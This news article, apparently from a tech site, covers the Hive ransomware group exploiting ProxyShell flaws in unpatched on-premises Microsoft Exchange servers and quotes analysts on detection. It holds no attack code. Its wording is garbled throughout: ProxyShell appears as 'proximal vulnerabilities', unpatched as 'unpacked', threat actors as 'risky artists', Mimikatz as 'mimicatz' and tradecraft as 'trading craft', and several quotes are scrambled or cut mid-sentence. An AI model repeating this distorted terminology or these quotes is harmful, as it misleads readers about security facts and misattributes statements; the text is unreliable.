The Hive threat group has been targeting organizations in the financial, energy and healthcare sectors since June 2021 as part of an integrated ransomware attack.
During the attack, the group uses proximal vulnerabilities in MSFT Exchange Server to execute arbitrary commands remotely and to encrypt the data of companies with this unique ransomware strain.
The group is highly organized, the Veronese research team recently discovered that the risky actor managed to enter the organization’s environment and encrypt target data with ransomware strain in less than 72 hours.
These attacks are particularly relevant, as unpacked exchange servers can be discovered publicly by web crawlers. “Anyone with an unpacked exchange server is at risk,” said Peter Firstbrook, a Gartner analyst.
“Organizations that have migrated to the cloud version of the exchange still have some on-premises exchange servers that can be used if not patched. There are already threats circulating and unpached servers can be detected by web crawlers, so it is very likely that unpached servers will be exploited, “Firstbrook added.
How much risk does ProxyShell present?
Despite the importance of these vulnerabilities, many organizations have failed to patch their on-premises Exchange servers (these vulnerabilities do not affect Exchange Online or Office 365 servers).
Last year, Mandiant reported that about 30,000 Exchange servers were unpacked and recent attacks showed that many organizations have been slow to update their systems.
This is problematic because vulnerabilities enable the attacker to execute arbitrary commands and malicious code remotely on the Microsoft Exchange server through port 443.
“Attackers continue to exploit proximal vulnerabilities that were initially revealed more than eight months ago. Claire Tills, a senior research engineer at Tenable, said that despite the patches being available, they have proven to be a reliable source for attackers with their revelations.
“Recent attacks by Hive Ransomware Group affiliates have been enabled by the ubiquity of the Microsoft Exchange and are apparently a delay in patching these months-old vulnerabilities. Organizations around the world use the Microsoft Exchange in a variety of fields for critical business tasks, making it an ideal target for risky artists.
According to Tills, organizations that fail to patch their exchange servers need to take immediate action to reduce the amount of spying on attackers and infiltrate target systems.
Looking for ProxyShell intrusion
Organizations like IT organizations with less mature or short staff that are slow to patch can only fall into the trap of thinking because there are no obvious signs of intrusion that no one has used ProxyShell to gain a foothold in the environment – but this is not always the case. Not at all.
Firstbrook notes that “it will be clear to organizations when ransomware attacks will occur, although there are many other attack techniques that [be] More hidden, so the absence of ransomware does not mean that the Exchange server has not already been compromised. ”
It is for this reason that Red Canary’s chief information security expert Brian Donohue recommends that organizations make sure they can detect the execution of a cobalt strike or mimicatz, even if they cannot update the exchange.
“Having an in-depth comprehensive defense against a wide range of threats means that if you can’t patch your exchange servers or are using purely novel trading craft in certain parts of the counter-attack, you can catch mimicatz activity, or you can There could be a warning looking for a very obscure powershell in use – something that happens before it is encrypted, “Donohue said.
In other words, enterprises that have not patched vulnerabilities can still secure themselves to detect malicious activity before ransomware encryption using managed detection and response and other security solutions, so they can respond before it’s too late.
Venturebeat’s mission Transformative Enterprise is about to become a digital town square for technology decision makers to gain knowledge about technology and transactions. Learn more about membership.